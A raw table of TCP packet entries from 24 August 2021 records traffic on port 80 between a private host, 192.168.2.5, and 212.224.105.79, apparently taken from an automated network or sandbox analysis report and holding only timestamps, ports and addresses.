Aug 24, 2021 08:49:20.000757933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000758886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000773907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000792027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000808001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000817060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000819921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000828028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000848055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000868082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000885963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000893116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000896931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000907898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000926018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000941038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000957012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000963926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000969887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000973940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.001004934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.001009941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.001028061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.001076937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.001080990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.001848936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.001919985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002063036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002079010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.002161026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002254963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002286911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.002450943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002564907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002772093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002819061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.002821922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.002825022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.003020048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003077030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003351927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003422976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.003433943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.003472090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003595114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003659010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.003710032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004127026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004168034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004307985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004328966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004375935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004376888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004383087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004398108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004425049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004445076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004467010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004482031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004484892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004492044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004511118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004532099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004555941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004565954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004570961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004580975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004601002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004621029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004641056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004654884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004668951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004672050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004679918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004699945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004722118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004736900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004741907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004745960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004766941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004786015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004800081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004823923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004837036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004849911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004863024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004878044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004882097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004883051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004898071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004919052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004920006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004924059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.004934072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004952908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004966974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.004987001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005006075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005021095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005040884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005053997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005068064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005086899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005100965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005105972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005108118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005127907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005142927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005151987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005156040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005162954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005182028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005199909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005212069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005214930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005218983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005234003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005251884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005271912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005291939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005306959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005309105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005311012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005330086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005342960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005362988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005378962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005392075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005404949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005410910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005410910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005424976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005444050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005458117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005461931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005464077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005476952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005496979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005513906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005527020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005539894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005553961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005565882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005579948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005592108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005604029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005619049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005631924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005645990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005659103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005671978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005686045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005711079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005717993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005721092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005732059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005770922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005795002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005812883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005821943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005826950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005831003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005851030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005871058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005891085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005903959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005908012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005911112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005928040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005945921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005964041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.005974054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005979061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.005980968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006000996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006016970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006033897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006051064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006058931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006062984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006068945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006087065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006103992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006110907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006114960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006119967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006139994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006156921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006172895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006191015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006203890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006217003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006232023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006237030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006237984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006256104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006273985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006293058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006305933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006318092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006321907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006323099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006340981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006350994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006354094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006357908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006373882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006388903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006405115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006427050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006443024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006459951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006470919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006479025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006479979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006495953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006511927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006525040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006529093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006531954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006550074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006567001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006588936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006603003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006604910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006608963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006619930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006637096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006658077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006680012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006696939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006705999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006709099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006719112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006740093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006755114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006772041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006788969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006804943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006812096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006814003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006827116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006845951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006861925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006880045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006882906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006885052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006899118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006913900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006934881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.006946087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006948948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.006951094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.007005930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.007009983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.008546114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.023436069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023468018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023483992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023499966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023515940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023531914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.023571014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024254084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024372101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024391890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024410009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024444103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024455070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024516106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024532080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024548054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024564028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024583101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024597883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024600983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024602890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024619102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024635077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024651051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024662971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024665117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024667025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.024674892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.024759054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.025409937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025430918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025453091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025469065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025485039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025502920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025505066 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.025509119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.025518894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025536060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.025605917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.025610924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030111074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030137062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030179977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030195951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030211926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030229092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030247927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030266047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030282021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030297995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030307055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030313969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030329943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030345917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030361891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030380011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030381918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030381918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030400038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030415058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030431986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030438900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030442953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030448914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030464888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030481100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030497074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030510902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030515909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030515909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030533075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030550003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030565977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030567884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030572891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030581951 CEST	80	49712	212.224.105.79	192.168.2.5
